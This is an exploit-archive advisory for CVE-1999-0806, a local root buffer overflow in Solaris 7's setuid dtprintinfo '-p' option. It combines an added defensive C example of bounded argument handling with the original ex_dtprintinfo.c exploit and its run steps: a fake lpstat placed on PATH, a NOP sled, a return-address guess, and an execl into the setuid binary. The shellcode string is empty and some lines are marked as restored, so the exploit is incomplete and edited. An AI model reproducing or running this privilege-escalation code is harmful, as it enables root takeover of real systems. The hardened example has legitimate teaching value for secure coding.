Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Local Buffer Overflow

Related Vulnerabilities: CVE-1999-0806  
Publish Date: 10 May 1999

dtprintinfo is a setuid-root command that opens the CDE Print Manager window. A stack-based buffer overflow in the handling of the "-p" option allows execution of arbitrary code as root.

This vulnerability has been assigned Sun Bug# 4139394. The vulnerability is in the CDE 1.2 and CDE 1.3 subsystems of Solaris 2.6 and Solaris 7 respectively.
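The bug class behind this advisory is a fixed-size stack buffer that receives the "-p <printer>" argument without a length check. The following is an added illustration, not the original exploit and not CDE's own code: the unsafe copy pattern is shown next to a hardened handler that rejects over-long or unexpected printer names before copying. The buffer size, character set and function names are assumptions made for the example.

```c
/* Added example: unsafe vs. bounded handling of a "-p <printer>" argument.
 * Not CDE's code; PRINTER_NAME_MAX and the function names are assumed. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PRINTER_NAME_MAX 64   /* assumed buffer size, not CDE's actual value */

/* Vulnerable pattern: strcpy() of a caller-controlled argument into a fixed
 * stack buffer.  An argument of PRINTER_NAME_MAX bytes or more writes past
 * the buffer and into the saved frame, which is the defect this advisory
 * describes.  Only ever call this with short input. */
int handle_printer_option_unsafe(const char *arg)
{
    char printer[PRINTER_NAME_MAX];
    strcpy(printer, arg);             /* no bounds check */
    return (int)strlen(printer);
}

/* Hardened form: reject anything that does not fit (leaving room for the
 * terminator) and anything outside a conservative character set, then copy
 * exactly len+1 bytes.  Returns 0 on success, -1 when the argument is rejected. */
int handle_printer_option_safe(const char *arg, char *out, size_t outsz)
{
    size_t len, i;
    if (arg == NULL || out == NULL || outsz == 0)
        return -1;
    len = strlen(arg);
    if (len == 0 || len >= outsz)
        return -1;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return -1;
    }
    memcpy(out, arg, len + 1);
    return 0;
}

/* Minimal argument parser mirroring "-p <name>"; returns 0 when a valid
 * printer name was stored in `printer`, -1 otherwise. */
int parse_args(int argc, char **argv, char *printer, size_t printersz)
{
    int i;
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-p") == 0) {
            if (i + 1 >= argc)
                return -1;            /* "-p" with no value */
            return handle_printer_option_safe(argv[i + 1], printer, printersz);
        }
    }
    return -1;
}

int main(int argc, char **argv)
{
    char printer[PRINTER_NAME_MAX];
    if (parse_args(argc, argv, printer, sizeof printer) != 0) {
        fprintf(stderr, "usage: %s -p <printer-name>\n", argv[0]);
        return 1;
    }
    printf("printer: %s\n", printer);
    return 0;
}
```

Run it as `./a.out -p lp0` to see the accepted path; a value of 64 or more characters is refused with the usage message instead of reaching the copy. The length test uses `>=` rather than `>` because the NUL terminator also needs a byte, an off-by-one that bounded copies frequently get wrong.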

Before running the ex_dtprintinfo exploit, set your DISPLAY environment variable correctly and create a dummy lpstat command like:

% cat > lpstat
echo "system for lpprn:"
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out 

/*
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (
   Written by UNYUN (
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static char             x[1000];
#define ADJUST          0
#define STARTADR        621
#define BUFSIZE         900
#define NOP             0x90
unsigned long ret_adr;
int     i;
char exploit_code[] =
        /* the shellcode bytes are absent from this copy of the exploit */
        "";

/* return the current stack pointer (value left in %eax) */
unsigned long get_sp(void)
{
  __asm__(" movl %esp,%eax ");
}

int main(void)
{
        /* fill the argument buffer with a NOP sled */
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;
        /* copy the shellcode in at STARTADR (loop body missing from this copy;
           restored from the STARTADR definition) */
        for (i=0;i<strlen(exploit_code);i++)
                x[STARTADR+i]=exploit_code[i];
        /* guessed return address relative to the current stack pointer */
        ret_adr=get_sp() - 1292 + 148;
        /* overwrite the start of the buffer with repeated copies of it */
        for (i = ADJUST; i < 400 ; i+=4){
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        }
        /* pass the buffer as the "-p" argument */
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
        "-p",x,(char *) 0);
        return 0;
}